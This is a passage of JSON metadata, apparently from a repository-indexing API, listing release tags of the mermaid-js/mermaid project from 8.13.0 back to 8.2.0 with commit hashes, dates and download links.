6f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.e